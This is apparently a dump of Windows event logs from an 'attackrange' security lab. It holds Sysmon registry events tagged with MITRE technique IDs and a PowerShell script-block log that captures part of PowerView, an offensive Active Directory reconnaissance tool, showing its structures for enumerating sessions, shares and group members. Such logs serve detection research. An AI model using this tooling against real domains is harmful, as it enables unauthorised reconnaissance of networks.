58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023456Applicationar-win-dc.attackrange.localC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 13241300x800000000000000058922Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-08 13:22:43.578{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000061626Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-08 11:53:15.272{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000056238Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-07 20:25:41.328{03D06954-E744-65C3-43CC-000000004703}4496C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000056237Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-07 20:25:41.313{03D06954-E745-65C3-44CC-000000004703}1848C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000053007Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-07 20:25:02.356{7A09209E-E71E-65C3-1ACD-000000004703}3964C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000053006Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-07 20:25:02.356{7A09209E-E71D-65C3-19CD-000000004703}7116C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000056035Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-07 19:52:49.721{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000056027Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-07 19:51:43.743{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000052807Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-07 19:51:34.614{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000052803Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-07 19:51:31.168{7A09209E-DF43-65C3-47CC-000000004703}4412C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000056019Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-07 19:50:55.554{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000051096Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-07 15:01:17.858{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000050322Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-07 09:05:38.194{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000046870Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-07 02:53:25.221{7A09209E-F0A5-65C2-45B4-000000004703}6676C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000045150Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-06 22:08:09.864{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000045907Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-06 20:25:41.415{03D06954-95C4-65C2-0FAA-000000004703}4808C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000045906Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-06 20:25:41.383{03D06954-95C5-65C2-10AA-000000004703}3776C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000044544Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-06 20:25:02.277{7A09209E-959D-65C2-1AAB-000000004703}7916C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000044543Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-06 20:25:02.277{7A09209E-959E-65C2-1BAB-000000004703}7776C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000044712Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-06 17:00:12.439{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000039509Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-06 05:58:01.810{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000039136Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-06 00:59:46.759{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000037537Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-05 20:25:41.222{03D06954-4444-65C1-1F88-000000004703}3064C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000037536Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-05 20:25:41.206{03D06954-4445-65C1-2088-000000004703}5500C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000036175Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-05 20:25:02.230{7A09209E-441D-65C1-2D89-000000004703}792C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000036174Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-05 20:25:02.211{7A09209E-441E-65C1-2E89-000000004703}7792C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000033871Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-05 13:48:53.888{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000033520Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-05 08:54:21.577{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000027911Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-04 20:42:44.944{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000029171Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-04 20:25:41.269{03D06954-F2C4-65BF-3466-000000004703}5684C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000029169Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-04 20:25:41.238{03D06954-F2C5-65BF-3566-000000004703}668C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000027802Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-04 20:25:02.239{7A09209E-F29D-65BF-3F67-000000004703}3752C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000027801Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-04 20:25:02.222{7A09209E-F29E-65BF-4067-000000004703}7792C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000027937Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-04 16:53:56.181{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000021817Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-04 03:14:35.905{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000022330Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-04 00:48:31.313{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000020801Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-03 20:25:41.162{03D06954-A144-65BE-4344-000000004703}3396C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000020800Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-03 20:25:41.146{03D06954-A145-65BE-4444-000000004703}5540C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000019433Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-03 20:25:02.267{7A09209E-A11D-65BE-4D45-000000004703}7504C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000019432Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-03 20:25:02.243{7A09209E-A11E-65BE-4E45-000000004703}3692C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000015615Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-03 09:27:27.109{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000016710Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-03 08:43:06.325{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000012428Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-02 20:25:41.273{03D06954-4FC4-65BD-5522-000000004703}2332C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000012427Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-02 20:25:41.257{03D06954-4FC5-65BD-5622-000000004703}4396C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x800000000000000011063Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-02 20:25:02.153{7A09209E-4F9E-65BD-6023-000000004703}7364C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000011062Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-02 20:25:02.153{7A09209E-4F9D-65BD-5F23-000000004703}6916C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x800000000000000010017Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-02 17:25:18.433{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x800000000000000011124Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-02 16:42:41.199{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000004295Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-02 02:50:45.691{7A09209E-5883-65BC-430A-000000004703}1640C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)AR-WIN-2\Administrator 13241300x80000000000000005504Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-02 00:37:16.157{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003497Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-02 00:37:09.699{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003471Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-02 00:33:25.104{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000005460Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-02 00:32:15.483{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003450Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-02 00:30:48.778{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000005423Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-02 00:27:14.664{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003423Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-02 00:26:58.818{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003282Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-02 00:11:28.941{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_2f8ce8\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003280Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-02 00:11:28.925{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_2f8ce8\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003278Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-02 00:11:28.925{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_2f8ce8\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003276Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-02 00:11:28.925{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2f8ce8\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003274Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-02 00:11:28.925{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_2f8ce8\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000003272Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-02 00:11:28.925{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_2f8ce8\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 4104132150x0170097Microsoft-Windows-PowerShell/Operationalar-win-dc.attackrange.local6464 '0x00000000' GROUP_OBJECT = '0x10000000' NON_SECURITY_GROUP_OBJECT = '0x10000001' ALIAS_OBJECT = '0x20000000' NON_SECURITY_ALIAS_OBJECT = '0x20000001' USER_OBJECT = '0x30000000' MACHINE_ACCOUNT = '0x30000001' TRUST_ACCOUNT = '0x30000002' APP_BASIC_GROUP = '0x40000000' APP_QUERY_GROUP = '0x40000001' ACCOUNT_TYPE_MAX = '0x7fffffff' } # used to parse the 'grouptype' property for groups $GroupTypeEnum = psenum $Mod PowerView.GroupTypeEnum UInt32 @{ CREATED_BY_SYSTEM = '0x00000001' GLOBAL_SCOPE = '0x00000002' DOMAIN_LOCAL_SCOPE = '0x00000004' UNIVERSAL_SCOPE = '0x00000008' APP_BASIC = '0x00000010' APP_QUERY = '0x00000020' SECURITY = '0x80000000' } -Bitfield # used to parse the 'userAccountControl' property for users/groups $UACEnum = psenum $Mod PowerView.UACEnum UInt32 @{ SCRIPT = 1 ACCOUNTDISABLE = 2 HOMEDIR_REQUIRED = 8 LOCKOUT = 16 PASSWD_NOTREQD = 32 PASSWD_CANT_CHANGE = 64 ENCRYPTED_TEXT_PWD_ALLOWED = 128 TEMP_DUPLICATE_ACCOUNT = 256 NORMAL_ACCOUNT = 512 INTERDOMAIN_TRUST_ACCOUNT = 2048 WORKSTATION_TRUST_ACCOUNT = 4096 SERVER_TRUST_ACCOUNT = 8192 DONT_EXPIRE_PASSWORD = 65536 MNS_LOGON_ACCOUNT = 131072 SMARTCARD_REQUIRED = 262144 TRUSTED_FOR_DELEGATION = 524288 NOT_DELEGATED = 1048576 USE_DES_KEY_ONLY = 2097152 DONT_REQ_PREAUTH = 4194304 PASSWORD_EXPIRED = 8388608 TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216 PARTIAL_SECRETS_ACCOUNT = 67108864 } -Bitfield # enum used by $WTS_SESSION_INFO_1 below $WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{ Active = 0 Connected = 1 ConnectQuery = 2 Shadow = 3 Disconnected = 4 Idle = 5 Listen = 6 Reset = 7 Down = 8 Init = 9 } # the WTSEnumerateSessionsEx result structure $WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{ ExecEnvId = field 0 UInt32 State = field 1 $WTSConnectState SessionId = field 2 UInt32 pSessionName = field 3 String -MarshalAs @('LPWStr') pHostName = field 4 String -MarshalAs @('LPWStr') pUserName = field 5 String -MarshalAs @('LPWStr') pDomainName = field 6 String -MarshalAs @('LPWStr') pFarmName = field 7 String -MarshalAs @('LPWStr') } # the particular WTSQuerySessionInformation result structure $WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{ AddressFamily = field 0 UInt32 Address = field 1 Byte[] -MarshalAs @('ByValArray', 20) } # the NetShareEnum result structure $SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{ Name = field 0 String -MarshalAs @('LPWStr') Type = field 1 UInt32 Remark = field 2 String -MarshalAs @('LPWStr') } # the NetWkstaUserEnum result structure $WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{ UserName = field 0 String -MarshalAs @('LPWStr') LogonDomain = field 1 String -MarshalAs @('LPWStr') AuthDomains = field 2 String -MarshalAs @('LPWStr') LogonServer = field 3 String -MarshalAs @('LPWStr') } # the NetSessionEnum result structure $SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{ CName = field 0 String -MarshalAs @('LPWStr') UserName = field 1 String -MarshalAs @('LPWStr') Time = field 2 UInt32 IdleTime = field 3 UInt32 } # enum used by $LOCALGROUP_MEMBERS_INFO_2 below $SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{ SidTypeUser = 1 SidTypeGroup = 2 SidTypeDomain = 3 SidTypeAlias = 4 SidTypeWellKnownGroup = 5 SidTypeDeletedAccount = 6 SidTypeInvalid = 7 SidTypeUnknown = 8 SidTypeComputer = 9 } # the NetLocalGroupEnum result structure $LOCALGROUP_INFO_1 = struct $Mod LOCALGROUP_INFO_1 @{ lgrpi1_name = field 0 String -MarshalAs @('LPWStr') lgrpi1_comment = field 1 String -MarshalAs @('LPWStr') } # the NetLocalGroupGetMembers result structure $LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{ lgrmi2_sid = field 0 IntPtr lgrmi2_sidusage = field 1 $SID_NAME_USE lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr') } # enums used in DS_DOMAIN_TRUSTS $DsDomainFlag = psenum $Mod DsDomain.Flags UInt32 @{ 